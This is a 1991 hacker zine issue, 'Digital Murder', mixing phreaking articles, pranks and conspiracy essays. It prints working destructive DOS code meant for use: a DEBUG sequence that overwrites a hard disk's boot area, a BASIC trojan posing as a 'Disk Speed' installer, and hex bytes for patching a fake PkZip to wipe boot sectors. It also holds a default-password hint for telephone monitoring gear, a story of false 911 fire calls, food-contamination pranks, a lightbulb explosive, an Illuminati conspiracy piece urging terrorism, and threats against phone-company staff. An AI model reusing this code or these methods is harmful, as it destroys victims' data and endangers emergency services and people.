/// / /// / ///// // / // // // // /// /// //// /// / / / /__ / / / / / /// /// // // / / / / / / / / / / / / / / //// / // // // // // /// / / /'' /// /// / //// / / / / ///// // // ///// // \ /// ///// // \ A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes Issue No. 01 October '91 A Danger Kult Production. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- These filez are for educational and informational studies only. The writers for Digital Murder will not be responsible for any use or misuse of information published in this disk-based magazine. The magazine and its contents are free to the public and may be freely distributed in any form as long as Digital Murder magazine and the author is given credit. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Information is Power. Greetings and welcome to the first /// / /// / ///// // / issue of Digtal Murder. This pro- / / / / / / / / / ject has taken too long but I hope / / / / '/ / / //// / future issues come out on time and /// / //// / / / / ///// more people get involved. If you are interested in sending articles // // // // /// /// //// /// to us then call one of our support /// /// // // / / / / / / / boards or write us at our P.O.Box. // // // // // /// / / /'' /// We have many other projects in the // // ///// // \ /// ///// // \ works as well as making improve- ments to the 'zine as we go along. P.O. Box 280363 This is the 80 column version of Memphis, TN Digital Murder. We also have a 40 38168 column version of each issue. We hope to have a letters section Editor: Morpheus in this zine so drop us a line in our P.O. Box. Hate mail, articles Writers: Morpheus for the 'zine, ads for boards and Blackened other 'zines, questions, comments, Technysis etc. . are all welcome. Neuron God Placebo Effect Digital Terrorist Zapped Support: Backdoor--901.386.6455 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I N T H I S I S S U E Page# -=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3 From the Mouth of Blackened-- Editorial from veteran Phreak. 4 Secret Societies in Govt. -- Placebo Effect exploits all. 6 Fnords -- Subliminal control by Binky. 7 Anarchy For Sale -- Digital Murder's Anarchy Cookbook. 8 Phun with Frozen Shit -- literally...by Neuron God. 9 Lineage 2000 RAS Tech Info.-- A look at Voltage monitoring sys. 11 Phun with 911 -- Technysis and Blackened's adventures. 13 Scan of the Month Club -- A few things to keep you busy. 15 There's a Virus in my Soup -- Techniques by Digital Terrorist. 17 Phone Company Hate Mail -- Letter of humorous interest. 19 Heaven's Trash -- Final Words from Morpheus. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3 From the Mouth of Blackened -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Well, I have some shit to say. First off, fuck Wild Cat, the dude who turned me in to the Secret Service. Next, just because I have not been seen on the Backdoor doesn't mean I am not the official SysOp still. Technysis can't be God forever. . . Hahaha. Onward. I started off in late '84 as a young punk ass but soon progressed to higher knowledge of phreaking. I then escalated my knowledge even further. I have dropped out of the scene more and more this past year or so but you know how it is. . . real life comes into play at some point. I realize that all this undergroud mayhem is truly nessecery for the advancement of our social/security system as a whole. It's cool to hack a military defense system which me and Morpheus have done on occasion BUT you don't want some asshole behind the keys trying to kill us all so it all works out evenly. Some people get busted, the security of a system is spruced up and the new generation of hackers is born. The system is cracked, more people get busted. It goes on and on. With out crackdowns and system pipe-ups we would all have equal knowledge and then no one would learn from each other. That would be just plain boring. Shit, punks might start doing homework at night again instead of infultrating systems for the cause: The cause for the freedom of information attainment and exchange. INFORMATION IS POWER. Well enuff of my philosophy...which no one probably understands. I'm out of here for now but remember. . . Pussy is cool, but when its dead, its cold. BLACKENED ----------------------------------------------------------------- Hmmm... well we have what... a fuckin' half page or so left. Fuck it. I'm tired. Just read my other articles in this Issue of Digital Murder. Look at the rest of this empty page. Stare at it. Feel the power of negative space. How low can you go? ----------------------------------------------------------------- 4 ******************************************** *Secret Societies and the Secret Government* ******************************************** A text-file by Placebo Effect (DK, InFOWORD) Today's world is a difficult world, as we can all relate to. We live in a country that was based on some really good ideas, but has since moved in the opposite direction from freedom to oppression and dictatorship. Our elected officials are not representing us, the people, but the big businesses, corporations, anyone with enough money to contribute to their own pockets. We live in a nation where double standards are a way of life, where the budget needs to be balanced and the deficit is huge, and where on top of all these problems, Congress can give themselves a raise for causing all this shit to happen. This article is to open awareness to these problems and how they affect YOU, the person, the CITIZEN of the United Socialist Republic of Amerika. As information is suppressed and the truth denied, it is hard to believe what others say. The lies are said to be truths, truths to be lies, and coverups to be a great way to get laid. Please believe the contents of this file, as they are TRUE, in the eyes of any openminded nonsheep human. We, the Goyim (human cattle) live for the whims of a few. Many of the people in the resistance call these few the ILLUMINATI. These people DO exist, and are destroying the world to this day, preparing it for total domination by the rich and powerful. The government denies all existance of this Super-ELITE group, because the ILLUMINATI controls all the governments of the world to some extent. Massive coverups, lies, distorted truths, murder, are all the tools of the Illuminati. Never be fooled by the halftruth telling lying mother fuckers of Congress. The story goes back centuries ago, but I will start a mere century and a half ago, in 1840. In 1840, General Albert Pike came under influence of other One Worlders (people for one world government) and decided to build a military blueprint that calls for 3 world wars and 3 major revolutions. He did most of his work in a 13 room mansion in Little Rock, Arkansas. When the Illuminati, and the lodges of the Grand Orient became suspect, Pike organized The New and Reformed Palladian Rite. He established three supreme councils; one in Charleston, S.C., another in Rome, Italy and another in Berlin, Germany. He had another one worlder, Mazzini, establish 23 subordinate councils in strategic locations throughout the world, which have been the secret headquarters of the world revolutionary movement ever since. These councils secret controlled inconspicuous "incidents" that took place all over the world that would lead to the spark of war. Pike's plan required that Communism, Naziism, Political Zionism, and other International movements be organized and used to foment the three global wars and three major revolutions. The First World War was to be fought so as to enable the Illuminai to overthrow the powers of the Tzars in Russia and turn that country into the stronghold of Atheistic-Communism. The differences stirred up by agentur of the Illuminati between the British and German Empires were to be used to foment this war. After the war ended, Communism was to be built up and used to destroy other governments. 5 World War Two was to be fomented by using the differences between Fascists and Political Zionists. This war was to be fought so that Naziism would be destroyed and the power of Political Zionism increased so that the sovereign state of Israil could be established in Palestine. during World War Two, International Communism was to be built up until it equalled in strength that of united Christendom. At this point it was to be contained and kept in check until required for the final social cataclysm. World War Three is to be fomented by using the differences the agentur of the Illuminati stir up between Political Zionists and the leaders of the Moslem world. The war is to be directed in such a manner that Islam (the Arab World including Mohammedanism) and Political Zionism (including the State of Israel) will destroy themselves while at the same time the remaining nations, once more divided against each other on this issue, will be forced to fight themselves into a state of complete exhaustion physically, mentally, spiritually and economically. Pike, on August 15, 1871, told Mazzini that after World War Three is ended, those who aspire to undisputed world domination will provoke the greatest social cataclysm the world has ever known. Quoting a letter (taken from a letter catalogued in the British Museum Library, London, England): "We shall unleash the Nihilists and Atheists, and we shall provoke a formidable social cataclysm which in all its horror will show clearly to the nations the effect of absolute atheism, origin of savagery and of the most bloody turmoil. Then everywhere, the citizens, obliged to defend themselves against the world minority of revolutionaries, will exterminate those destroyers of civilization, and the multitude, disillusioned with Christianity, whose deistic spirits will be from that moment without compass (direction), anxious for an ideal, but without knowing where to render its adoration, will receive the true light through the universal manifestation of the pure doctrine of Lucifer, brought finally out in the public view, a manifestation which will result from the general reactionary movement which will follow the destruction of Christianity and atheism, both conquered and exterminated at the same time." People, we are sheep being led to slaughter. Our brothers are dying in foreign wars created by these powermonger assholes we call Big Business. We must fight this evil with all our heart and dedication. Terrorism against big business, against government. VOTE for competent people who can think with their heads, not with their pocketbook. Get the crooks out of Congress, Senate, White House and maybe we can salvage whats left of this shitty nation. I hope you read this file with earnest and learned that YOU are just a Pawn. Expendable. But it doesn't have to be that way. 6 ---------------------------------------------------- F N O R D S ! --=-=-=-=-=-=-=-- This article was found late one nite on the Digital Murder article submissions UD area. The beginning was screwed up a little but I left all I could salvage in order to give proper credit to the author and others responsible for its publication. The article is great so read!! Thanks to whoever uploaded it to the Backdoor and, last but not least, THE WRITER, Binky, who deserves proper credit. -Morpheus/Editor. By: Binky - RoR - ------------------------------------------------------------------------- Shawn-Da-Lay Boy Productions, Inc. ------------------------------------------------------------------------- ---The HQ of SDBP, inc - 415.236.2371--The Electric Pub - 415.236.4380--- -Primary Drop Sites-----Rat Head - 415.524.3649-----Primary Drop Sites--- ------------------------------------------------------------------------- A Fnord is a word that you have, unknowingly since the start of your ''education'', been conditioned to associate with fear and unease. You have also been conditioned not to notice that they are there. The institution of ''Fnord conditioning'' in American elementary education was first done in the fifties. Why do this? Well, if a government or other large organization wants to have some immediate control of large crowds, they must use preconditioned reflexes. Fear and general unease are always good emotions to evoke when seeking control. The use of Fnords in news casting can be used to create either a sense of revultion towards specific people or things (creating bias without your knowing why) or, applied differently, a sense of urgency and importance towards the issues focused upon. The use, or specific lack of use, of Fnords in advertising is the reason that the American public only feels happy when they're consuming. It works something like this: Everyday the people are bombarded with thousands of Fnords - in newspapers, newscasts, television shows, radio programs, lectures, texbooks, novels, etc. Therefore, as Fnords are creating unease at every turn, a lack of Fnords causes great relief - much like taking off a heavy pack after hiking all day. The folks at Madison Avenue realize this all too well, and use it to their benefit. By including absolutely no Fnords in their advertisements they create a sense of well being that always occurs , quite inexplicably, whenever their product is advertised. After a while people begin to associate well being with that product subconsciously. Then, next time they are shopping, their subconscious urges them to buy that which relieves the unease, and they buy the advertised product. Sneaky, but very effective. Watch for them. Call these other fine boards..... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= The Legion Outpost...................................415/521/7413 =- -= The Crystal Ship.....................................415/524/9951 =- -= The Village..........................................415/237/4145 =- -= Pro Leech............................................415/236/8192 =- -= The Nimitz Downport..................................415/276/3677 =- -= Lunatic Labs.........................................213/655/0691 =- -= Bad Dudes Hideout....................................415/391/0704 =- -=-=-=-=-=-=-=-=-=-=-=-=-=-=- RoR - Alucard -=-=-=-=-=-=-=-=-=-=-=-=-=- 7 - = A N A R C H Y F O R S A L E = - Bulb Bomb - Neuron God. -=-=-=-=-=- Try this. Put some alcohol (Isopropyl or Denatured-- Isopropyl is what's been tested by me.. Denatured is just plain dangerous and flammable as hell... something like 600 proof) on a fair sized piece of steel wool. Use quadruple-zero grade (the really powdery steel wool) for best effects. Now, after you've soaked the steel wool in the alcohol for a while (long enough to get it to hold some of the stuff) wrap it around a burned-out lightbulb. Do not use one if it is already cracked or has a hole in it anywhere. Next, twist the steel wool together so that it stays without you having to hold it. Now bend a coathanger so that it holds the screw end of the lightbulb LOOSELY (loose enough so that you can sling the lightbulb into the air). See what I'm getting at? heh- heh-heh. Now place the lightbulb in the launcher and light up the steel wool. The alcohol will burn just hot enough to catch some of the steel wool on fire. As the closed lightbulb gets hot, the gases inside expand. If you put the steel wool too far down then the only thing that will happen is the lightbulb will separate from the base. The wool should go around the fattest part of the bulb. Soft-whites work best because they are squared off. When the gases inside expand enough... BOOM!! You should let the alcohol burn for a couple of seconds before you launch the sucker. If not it will hit the ground before it explodes. This will not work every time. By the way they're made, lightbulbs come out all different thicknesses, with all different amounts of gas inside, different mixtures of gas, etc. Experiment and find your favorite kind of bulb for this. The timing will depend heavily on what kind of bulb you use so experiment here as well. USE SAFETY GOGGLES!!! Your eyes will be damaged beyond all repair if this sucker goes wrong. Although we are not responsible if you are careless and get hurt, we still stress SAFETY in your anachist ventures. Be careful and alwayz smile while you destroy. Condensing Coke -=-=-=-=-=-=-=-=- This should let you use a regular soft drink (like Coke) to make a strong acid. Stretch a balloon over the top of a Coke can (before you open it). CAREFULLY open the can so that the CO2 coming out of it is captured in the balloon. Let the coke sit until all of the CO2 is out of the Coke and in the balloon. It's a good idea to stretch the balloon out first, and fasten it tightly around the rim. Now, if you get enough CO2 in the balloon, you should be able to close off the end and have an inflated balloon, full of CO2. Now all you have to do is get a SMALL amount of water and add the CO2 into it. The most common method of doing this is by putting the balloon over a container of some kind and applying pressure to the balloon to force the CO2 into the cup. For the CO2 to dissolve in the water, the water must be kept cool, so surround the cup with 8 ice. Now, depending on how well you captured the CO2 and the mineral content of your tap water, you should have Carbonic Acid, which is a strong acid. There are other more assured methods of producing CO2 (baking soda and vinegar) but with this method you have the CO2 prepackaged. Try forcing CO2 into the water using chem lab glassware if you can find it. To do that you should set it up so that the CO2 produces bubbles in the water. Keep producing more and more CO2 until a piece of Magnesium will react with your acid. Always remember to keep the water cool otherwise the gas won't dissolve into it very well. +-----------------------------------------------------------+ **** Phun with frozen shit (literally...) **** **** by: Neuron God (9.14.91) **** **** InFOWOrd/Danger Kult **** +-----------------------------------------------------------+ There are times when everyone feels like getting revenge on someone or just plain hates some dumbass who never seems to go away. These people can be dealt with easily at only a small sacrifice by you. First, find some fresh animal shit (the fresher the better) and put it in your freezer until it's frozen solid. That's the sacrifice. Now, when you decide among the following options, you can choose your time and how many times you do the deed according to your stockpile of shit. Warm & Wonderful: Most shit smells worst when extremely hot. Just put some into the victim's microwave oven or regular oven when you know they won't be looking around the kitchen for a while. Go crazy with the settings. For a microwave, try 99 mins 99 secs and see what happens. You may have to adjust the time since some microwave won't take that much time. Set it to the highest power. Do the same with the regular oven. Since freezing things brings all the water in them to the surface, the thawing process should produce a nice sludge-type remnant of what you put in there. After it is thawed, the remaining material will start to cook and burn. Not good for the victim. The house/apartment will smell like burnt shit and they'll probably never clean their oven out. Up Yours: Once again, warmth is the key. Most people's cars run a little hot and so their exhaust is a good source of heat. Just shove a wad of frozen shit in the tailpipe- way up there - and let them do the rest. You could also pop the hood and just lay the stuff on top of their engine... preferably next to the air vent.... Don't ask what's in it: Break the frozen shit up into small pieces and sprinkle it over some of their frozen foods. Since it'll stay in the freezer until they take it out, it'll probably go unnoticed. Then, when they take the food out to thaw, everything you treated will smell VERY unedible. 9 Cubed: The old trick with the fly stuck in the plastic ice-cube comes to mind.. empty a tray of ice from their freezer and place a couple of small pieces in the tray. Then put water in it and place it on the bottom of the ice tray stack. By now most people have ice machines, so be creative with this one. In large amounts, frozen shit will create large pools of sludge when it is thawed since the water dissolves some of the minerals in it. This sludge is not something that one would be happy to see on their windows. Try slopping it on the ground somewhere that the victim often goes barefoot or even in their bathtub. Molded correctly, shit can look like a hamburger just as well as ground beef. Just stick a shit burger on the grill while the victim is having his next cookout and watch the fun. (((((((((((((((((((()))))))))))))))))))) LINEAGE 2000 RAS General and Technical Outline by Morpheus (((((((((((((((((((()))))))))))))))))))) Lineage 2000 Remote Access System (RAS) is used by Ma Bell to monitor all types of power equipment they use. Lineage 2000 has 16 analog and 16 binary input channels which are used for the system's monitoring purposes. Each analog input channel can measure ac and dc voltage from 10mV to 150V with accuracy of 0.1% of full-scale for dc measurements and 0.7% for ac. The binary input channels sense the presence or absence of voltage in ac or dc circuits from 20V to 150V. These are mainly used for monitoring alarms, relay coils or contacts, and sensing blown fuses. In addition, spare unused contacts can be monitored. Alarm Output info -=-=-=-=-=-=-=-=-=- The three alarm outputs are major alarm, minor alarm, and fault (aka watchdog) alarm. These alarms are provided as form-C contacts. The major or minor alarm can be activated when any analog channel goes outside a user specified window or when any binary channel switches to an abnormal state. The user decides whether any channel can trigger an alarm. The user also decides which alarm to trigger. The watchdog alarm is a fault alarm indicating an internal fault, or improper software execution. Upon experiencing a watchdog, The RAS actuates its watchdog alarm contacts (ie. it activates a light on the front panel) and tries to reset itself. Comm. Ports -=-=-=-=-=-=- Lineage 2000 has two standard RS-232 ports. Port 1 is used w/ a modem for dialup access (!). Port 2 is used to daisy chain two or more RAS together (more on this later). It can handle up to 8 other RAS units on a chain. 10 System Control -=-=-=-=-=-=-=-=- The heart of the RAS is a microprocessor in each unit that collects and processes data. Each configured analog input channel is sampled approx. every 15 seconds. Each measurement is compared to the alarm limits for that channel and used to update the internally stored stats. If an alarm exists, the specified alarm relay is on until the situation is corrected. The binary alarms are sampled several times per second and the alarms work the same of the analog alarms. Security Features -=-=-=-=-=-=-=-=-=- Each system has a two level login. The first login allows you access to the system with read access. After first level login is complete, the second level can then be accessed giving the user read/write access. Write level access allows you to change alarm limits, start trend studies, configure login screens, etc. A quick reminder: most systems still use the default passwords set up by the manufacturer and are relatively synonymous to the product name. (^HINT-HINT^) The first level login is 1 * and 2nd level is **. Initial level one entrance is prompted by your standard ''Enter Password:''. Enter 2nd level by typing login at * and then entering level two pw. RAS Configuration: Login <> 1per system up to 70 chars. Unit Desc. <> 1per unit up to 70 chars. Channel Desc. <> 1per channel up to 30 chars. Alarm Limits <> fully programmable Scale Factors <> scale for voltage/non-voltage printouts Channel Units <> Specifies voltage (V,KV,etc..)2chars max Statistics on other remote functions: Active Alarms <> All current alarms Alarm History <> 10 most recently retired alarms and 3 most recently retired per channel. Analog Channels <> 3 max vals/3 min vals/3 max hourly avgs. Trend Study <> Can be initiated for any one channel for up to 10 days. For those that plan to pick one up... Front Panel: Black Spattered Paint (Metal) Chassis: White Smoothed Paint (Metal) Size: 17''W x 12''H x 5''D Weight: 10lbs. 11 -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/- -/-P H U N W I T H 9 1 1-/- -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/- Written by: Technysis (9.28.91) Well, 911 is a system that can easily be exploited for fun in a few simple ways. These will be presented to you in this file in hopes of you learning a few things. DISCLAIMER: I am in no way responsible for the use of the information presented whithin this file. It is here for information purposes and hypothetical situations (wow what a big word). Now that all the bullshit is out of the way let's get down to business. I can guess what some of you are asking. . . How can we use 911 for fun? Well, pranking it is not fun in itself but how you actually do it. I'm going to talk about one way to do it and tell a little story about the lamer way. Ok, let's get going. The best way to 'get down' with 911 is through a cordless telephone. If you have an average I.Q., you'll know that there are only 10 cordless frequencies around. There are 10 for the handset and 10 for the base. We are just concerned about the base. Ok-a friend of mine, Blackened, found this out in a strange way. He took his phone handset out and was talking to someone then he got a revolutionary idea. Maybe he could pick up someone else's base conver- sation. I went to his house and we went driving around all over where he lives. He had the antenna out the car window with it on listening for other people's dialtones. Shure enuff, it happened. We found one, and what luck we had. It was only several blocks from a fire station. I parked out at the curb where the most likely spot the base was located at, and he had the idea to call 911. When they answered, it went something like this: 911: 911, Fire, Ambulance, Police? BLA: Help! The heater fell over in my room and caught the rug on fire! It's spreading. 911: Hold on sir, the firemen are on their way. BLA: Click.... --- ANI REDAIL --- 911: Sir, are you there? BLA: Hurry, ahhh, shit, help.... 911: Sir, Mr. Stevens... BLA: Click.... 12 We could hear the fire truck on the way, so we drove off and watched from a remote observation point. Notice how 911 called back. Since your I.Q. is pretty high, you knew that they would call back. If we had left before 911 had a chance to call back, they would not have called the fire station immediately, but would've waited for verification of the call. So, you guessed it, we waited for the call, and bullshitted and hung up. We did this several times to the same house. It was actually pretty funny to see the look on the homeowner's face when she was confronted by 5-6 firemen ready to put out a fire. This is basically the story and the way to do it, but if you did not find this informative then fuck you. Another way, the lamer way, is to just go up to a payphone and dial it. There is actually no fun in this, but it does the main thing. It pisses off the 911 operators and distracts them from their job. 911 is a service with several security loop holes left to be exploited. For example, not being able to trace through a PBX. Usually that isn't possible to start with, but for the phone Co. itself, it can be done. Why they don't? Who knows, but that is a whole different story all together. Well, that brings this artice to a close but stay tuned for more. As you have seen, my articles are not so much geared toword the technical side but to application and side-effects (fun) of the particular topic. I have several more lined up and if you want them, Digital Murder is the place. Thanks go out to: Blackened, for the idea and the good times that 911 has given us. Morpheus, editor-in chief of Digital Murder, for a good 'zine to put this article in. Call the home of Digital Murder: Backdoor/ X-Factor Whq 1200/2400 24hrz a day Demo/Text file support 901-386-6455 -Elites only. 13 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Digital Murder Scan 'o' de Month! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This month's scan of the month is by Zapped. He is planning on doing this section for every issue which is a good idea since he does a thorough job of reporting what he finds. I'm sure all of you will find something of interest within the numbers of our scan of the month. Enjoy, ...Morpheus. Prefix owned by: AT&T Dialtones(PBX-etc..) -------------------- 800-336-0163 800-336-0263 (dead PBX) 800-336-1156 800-336-9883 (wait a few rings...) Carriers -------- 800-336-0130 800-336-0176 (Military system) 800-336-0188 (Western Union Priority Mail Service-Acct. Id# prompt) 800-336-0189 ( '' '' '' '' '' '' '' '' ) 800-336-0338 800-336-0367 (UNIX??) 800-336-0543 ( '' '' '' '' ) 800-336-0643 (UNIX w/ Xenix terminal server) 800-336-0737 (Military system) 800-336-0811 800-336-1167 (Comdisco Computer Resource Center) 800-336-5409 (DeRoyal Industries VAX) VMB systems ----------- 800-336-0017 (Techmatic Message Center) 800-336-0205 (GTE South's VMS) 800-336-0276 (answering machine) 800-336-0286 (Business Travel News-- hit # to enter VMS) 800-336-1086 800-336-1227 (Phoenix VMS--3 digit boxes) 800-336-3001 (After business hrs. VMS) 800-336-6000 (Audix VMS) 800-336-9001 (Data General Digital Help Line & VMS) 800-336-9004 (The Phone-Mail System) 800-336-9050 800-336-9161 (Ramada Inn at 6 flags--Not a VMS--ext#987 =front desk) 800-336-9869 (Xerox Message Exchange) 800-336-9916 (Security Pacific Bank Card VMS--4 digit boxes) 800-336-9923 (Infrence Corp. VMS) 14 Misc. Digits ------------ 800-336-0441 (AlexPhone--Enter Soc. Sec. #--VMS?) 800-336-0540 (FAX) 800-336-0814 (FAX) 800-336-0892 (FAX) 800-336-0968 (someone's beeper..) 800-336-0997 (FAX) 800-336-1049 (FAX) 800-336-1061 (FAX) 800-336-1112 (FAX) 800-336-1119 (wierd beeping) 800-336-1151 (enter id) 800-336-1152 (enter id) 800-336-1153 (enter id) 800-336-1154 (enter id) 800-336-1156 (enter id) 800-336-1178 (FAX) 800-336-1188 (FAX) 800-336-1208 (FAX) 800-336-1398 (FAX) 800-336-1452 (wierd beeping) 800-336-1422 (FAX) 800-336-5002 (FAX) 800-336-9014 (FAX) 800-336-9017 (FAX) 800-336-9055 (wierd pulse) 800-336-9073 (FAX) 800-336-9840 (FAX+wierd beeping) 800-336-9846 (FAX) 800-336-9847 (FAX) 800-336-9856 (FAX) 800-336-9872 (FAX) 800-336-9890 (enter id) 15 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 5 Ways To Trash An Enemy's System -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- by: Digital Terrorist Well, we all certainly have those little friends who we don't like, don't we? Wouldn't be nice to just trash his system and be done with him? This will help. 1. If you are ever in a store that has demo computers and are bored, or, the more likely approach- are at your enemy's computer (BBS or whatever), here is a neat little trick you can do. Get to DOS (depends on program they are running.. Some are already in DOS. Then type in the following .. DEBUG A MOV AX,0201 MOV BX,0200 MOV CX,01 MOV DX,80 INT 13 INT 20 G E 200 CD 19 A 100 MOV AX,0301 G Q And then reboot. The hard drive light will be on, and it will sit there.. Took down a couple of stores in a local mall at 5 minutes a store, but i type fast, so don't expect it to go that fast. The clerks won't know what the hell you are doing, because they don't know shit about computes. (Fenris Wolf) 2. Compile this BASIC program on your computer, and send it to your "friend". Great for those that run bbs's. Be sure to include some ANSI drawing crap and some docs on what it does and how to use it. Also, include in the docs that it can take a lot of time to run (the more time this thing gets, the more damage it does, muhahaha!). What it does is make tons of directories with high ascii characters, and makes them EXTREMELY tough to delete. Have fun with this one! print "Disk Speed v1.2 lpha" print "Installation program" print:print "This could take up to 30 minutes. Please wait" print:print "Working"; again: chdir "\" for z=1 to 7 for i=1 to 8 j$(i)=chr$(int(rnd(1)*127+1)+128) next k$=j$(1)+j$(2)+j$(3)+j$(4)+j$(5)+j$(6)+j$(7)+j$(8) mkdir k$ chdir k$ print "."; next goto again 3. This is pretty cheap, but it works, AND it's great for doing damage quickly. 16 Use the Norton Utilites (or PC Tools Deluxe or Mace or whatever) and have some fun with the boot sector, file allocation tables, and root directory sectors! Now, reboot. Explain to your "friend" that a gigantic spark leaped through the powerline into his computer and that's why his system is like that. For even more speed, use the Norton Utilites "sector copying" feature to overwrite the first 200 sectors of his hard drive (this way, you will be sure you won't miss much). It's fast AND efficient... 4. Take a magnet up to your friend's floppy disks and then erase his IBMBIO.COM and IBMDOS.COM files (or MSDOS.SYS and IO.SYS) and his COMMAND.COM file. Make sure you have totally destroyed anything that will allow him to bootup. Note, this is a very shotty method, and not recommended. 5. Call up your favorite virus board and download EVERY single virus you can find. If you are good at programming assembly, consider using synonymous instructions in the viruses so they are hard to detect (that is, if this favorite person uses a virus scanner). Now, take the EXE's (or COM's) out of the compressed file. Make a batch file that runs all of the files. Then, make it into trojan horse form (add docs, ANSI crap, etc.), and name batch file that runs all executable files, INSTALL.BAT. When he runs INSTALL.BAT, or any of the EXE files, he'll have tons of viruses in his system, which, if you picked right, are very hard to remove. This one is a great trick to play on someone. Five Minute Trojan -=-=-=-=-=-=-=-=-= Need a trojan horse real quick? Install the following bytes before every B4 4C CD 21 (all this is hexadecimal- use Norton Utilites) in a popular program such as PkZip, then change the text that says "version 1.10" (in PkZip's case) to "version 2.00". Obtain all PkZip docs from the original PKZ110.EXE file, and only change parts of the documentation. Add stuff like "PkZip v2.00 is 90% faster, written in pure assembly language, and achieves 33% better compression." You get the picture. Make it a good looking trojan. Also, be sure to include near the front of the docs, in all caps, "DISABLE DISK CACHES WHEN USING!!!". This is absolutely necessary and cannot be ommitted. Ok, here are the bytes. They must be inserted (this is a pain, but use a text editor, find all occurances of ascii bytes 4LM! and insert before them this: "0123456789876543". Now, go into Norton Utilites, search for all occurrances of ^^^^^^^^^^^^^^^^ text phrase. Replace these with the hexadecimal bytes: B4 03 B0 C8 B5 00 B1 01 B6 00 B2 00 CD 13 Now, it's ready to go. Working correctly, this will wipe out their boot sector and some other sectors IF a) they don't have a disk cache installed b) they don't have a program that intercepts direct disk writes Now, have fun, and don't hurt anyone (muhahaha). 17 The End of the Phone Network.... ---------------------------------- Written by: Technysis This file was written over at a friends house one day while he was on the phone. I had just taken a stereo installer test, on his IBM, and found out that I didn't know as much as I had thought. So due to that fact, and the fact he was not in good conversation, I decided to write a file I wanted to send to SCB but then it started to get so stupid but Morpheus insisted it be included in the magazine to cause more trouble. ---------------------------------- Dear Bellsouth INC, It has come to my attention that you have slacked off in your security procedures over the past few years. Namely your At&t system. I know that when a calling card is illegally used overseas and is valid in the states, it is then destroyed. Well, if you had an average I.Q., possibly 2-10 for a Bellsouth employee, then you would know that Blue Boxing can still be done from overseas to here. Have you not ever fixed that problem yet? Get real. This is the information age and you are supposed to be the experts of it, with CLASS and 5AESS, along with the 911 system, which has many flaws. If you have not figured out how to stop the hacker revolution by now, then you might as well give up. The Bellsouth company, in conjunction with At&t, are plauged with many loopholes that can be exploited by those who understand and can manipulate the system. You can expect to hear from our little group of seasoned hackers, and bring the networks to a downfall. Those targeted are: COSMOS, MIZAR, and the heart of the X-25 systems. You may think that you are smart in the fact that you have stopped some of the best, like Legion of Doom and Craig Neidorf. You can do nothing to stop us, so pretty soon your jobs may be in jeopardy. So I am just writing this letter to let you know that this is the end of the beginning. The information age is at it's peak, and us, the pirates or so called hackers. Friends like Tristan have made connections with the media and have told the public about how the system could be exploited by those few talented individuals. Consider yourself lucky that the phone network of this current time has not totally been destroyed. As I said before, this is just the prelude to the havoc and evilness that is about to be brought unto the phone networks of the world. Do you not believe this to be true? Just count up the annual toll-fraud and you will see that a lot of people are serious about what they do and how they do it. That just goes to show you that free phone calls are not all there is to phreaking. It is the interaction of the trunk lines and being able to play the role of an under-paid low-life operator, and control the networks, to do our bidding. 18 After reading the forementioned text, consider this. Why don't you just save yourself a lot of time and money, and just bring back the 5xB crossbar system. By showing your ultimate incompetance, when you invented the revolutionary DTMF matrix, you did only one thing wrong. You created the phreaker. You published the tones for controlling the network, i.e. 2600, KT, SP, and TASI. But at first, pink noise could be used. Now, blue boxing can not be used here inside the United States. Back in the good ole days, it was fun to call for free, and start up a teleconference using a blue box. Those were the days, but you have ruined them for the younger phreaking community. My one plan that I want to carry out is the legendary Blotto Box. If you are smart enuff to call yourself an electronic enigineer, then you should know what this device can do. That, coupled with opening 20-30 manholes and making spaghetti out of the trunk lines, will help the repairman earn a little extra money in overtime to help keep food on the table at home. In effect, the Blotto Box will pump 220 volts into a loop distribution block, therefore causing part of the area code to be out of service. You should have fun trying to sort that mess out. Another pastime of me and my friends is obtaning telephone equipment. I would say that I have 2-3 repeater test sets, several tone test sets, TS-21, a Wiltron CMTS test set, which did make a good gun target, a cool OFFICIAL South Central Bell hat, several boxes or repeater cartridges, and a nice digital line tester. If you should ever send a special agent to my house, should you ever find it, I would have no choice but to turn him into an Official South Central Bell target, and to be quite honest, I would not feel any remorse. My hatred for Bell rises above all levels of comprehension that you can fanthom. The only way for me to release my hatred toword you is to find ways around any security you may come up with in the future, because what you have now is not much of a challenge. Your Lineage 2000 Remote Access System, RAS for short, or your VAX/VMS systems at Bell Labs ar not too interesting at this time. However, should you ever implement new and extensive protection, I may give it a try, which ultimately would aid you in impleminting higher levels of security. This may make you feel like you actually have a meaningful existance in todays job market but it is people like me and the rest of the hackers that give security ANALysts their jobs. In closing, all I have to say is that as of now, I am bored with your development. But now, with my aquisition of a COSMOS account, I will attempt to access your AMA logs, to help a few friends of mine, with their long diastance calling record. I am sure that by you trying to figure out how I am doing this, you will provide me with a small challenge. Have you ever heard of LOD? Well just imagine that group, 5 times better, and about 4 people with a severe hatred for Bell and everything concerning it. I am trying to alert you to this, because I am REALLY bored. That is all there is to it. COSMOS has many possibilites. I have dialups, passwords, wire centers, complete information on the system. I've been doing some checking on it and within the week, you shall see the fruits of my long and hard labor intensive work. Oh well, nice to talk to you. Hopefully this letter will reach someone who will realize 19 the true potential of it. Because talking to a TSPS operator is like talking to a 976 phone sex operator. They give out all types of information and if you talk right to them you don't have to pay. If you want to contact me then look on any of the more popular networks. For example, Internet, Bitnet, QSD, or any of the higher level Bell Labs mainframes. Superuser status is so easy to obtain on your systems. Signed, (Your alias here) ------------------------------------- There, as you can see, is one my extremely phucked up ideas of a letter to end to my local CO. Make copies of this and send them to 